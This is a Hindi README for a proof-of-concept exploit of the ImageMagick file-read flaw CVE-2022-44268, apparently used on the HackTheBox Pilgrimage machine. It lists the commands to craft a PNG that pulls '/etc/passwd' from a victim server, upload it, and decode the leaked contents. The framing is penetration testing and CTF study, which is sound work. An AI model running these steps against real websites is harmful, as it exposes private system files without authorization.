
CVE-2022-44268 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो ImageMagick द्वारा संसाधित क्राफ्ट किए गए PNG छवियों के माध्यम से मनमाना फ़ाइल पढ़ने को सक्षम करता है। पैठ परीक्षण और CTF चुनौतियों के लिए जनरेशन और डिकोडिंग स्क्रिप्ट शामिल हैं।
htb pilgrimage में भी उपयोग किया गया
MetabaseQ के शोधकर्ताओं ने CVE-2022-44268 की खोज की, अर्थात् ImageMagick 7.1.0-49 सूचना प्रकटीकरण के लिए संवेदनशील है। जब यह एक PNG छवि को पार्स करता है (उदाहरण के लिए, आकार बदलने के लिए), तो परिणामी छवि में एक मनमानी दूरस्थ फ़ाइल की सामग्री एम्बेड हो सकती है (यदि ImageMagick बाइनरी के पास इसे पढ़ने की अनुमति हो)।
चरण 1 :
चलाएँ
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
चरण 2 ;
चलाएँ
python3 magick_exploit.py generate -l [local_file] -o [output_file]
यहाँ इस मामले में स्थानीय फ़ाइल '/etc/passwd' है जिसे मैं पीड़ित मशीन से प्राप्त करना चाहता हूँ।
चरण 3 :
छवि फ़ाइल को वेबसाइट पर अपलोड करें
चरण 4 :
वेबसाइट से परिवर्तित छवि फ़ाइल प्राप्त करें। इसे 'downloaded_image.png' नाम दें
चरण 5:
चलाएँ
python3 decode_profile.py

यदि कोई त्रुटि आती है जैसे
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
इसका मतलब है कि आपने जिस फ़ाइल का उल्लेख किया है वह मौजूद नहीं है। जाँच के लिए /etc/passwd का उपयोग करें।